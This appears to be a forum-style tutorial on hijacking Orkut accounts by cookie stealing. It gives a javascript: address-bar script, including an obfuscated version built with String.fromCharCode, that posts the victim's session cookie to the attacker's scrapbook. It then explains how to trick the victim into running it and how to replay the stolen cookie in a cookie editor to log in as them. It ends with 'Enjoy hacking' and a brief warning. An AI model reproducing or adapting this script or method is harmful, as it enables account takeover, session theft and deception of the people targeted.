javascript:nobody=replyForm;nobody.toUserId.value=33444211;
nobody.scrapText.value=document.cookie;nobody.action='scrapbook.aspx?
Action.submit';nobody.submit()


How to use orkut cookies script?

1. Replace your number "UserId.value=33444211"

How to Replace your Number
1. Go to your Orkut album
2. Right click on any Photo> Properties>55886645.jpg It will be a Eight Digit Value.
3. Now replace your value with the value in the java script.


Your script will look like.

javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()

2.Now send this Cookie script to the victim and ask him to paste in Address bar and Press enter.

3.You'll get his orkut account cookie in your scrap book.

4.After getting a orkut account cookie go to your orkut Home page , Then click on Tools tab and then go to cookie editor plugin( Tools--> Cookie editor)

5.click filter/refresh.look for 'orkut_state' cookie. just double click it and replace the orkut_state part with your victim's Script
put ur eight digit number in the place of (33444211).

Thats it your done with.

Logout of your orkut and login again and you'll be in your victims Homepage.

6.So remember guys...if you are having orkut account or having any other account....never use any suspicious script to prevent anyone from hacking/accessing your orkut account.

I hope you have learned how to hack orkut accounts using cookie stealing. Just the script can be used to hack orkut accounts and then access victim's orkut account. Enjoy hacking orkut.


Enjoy HaCkInG.....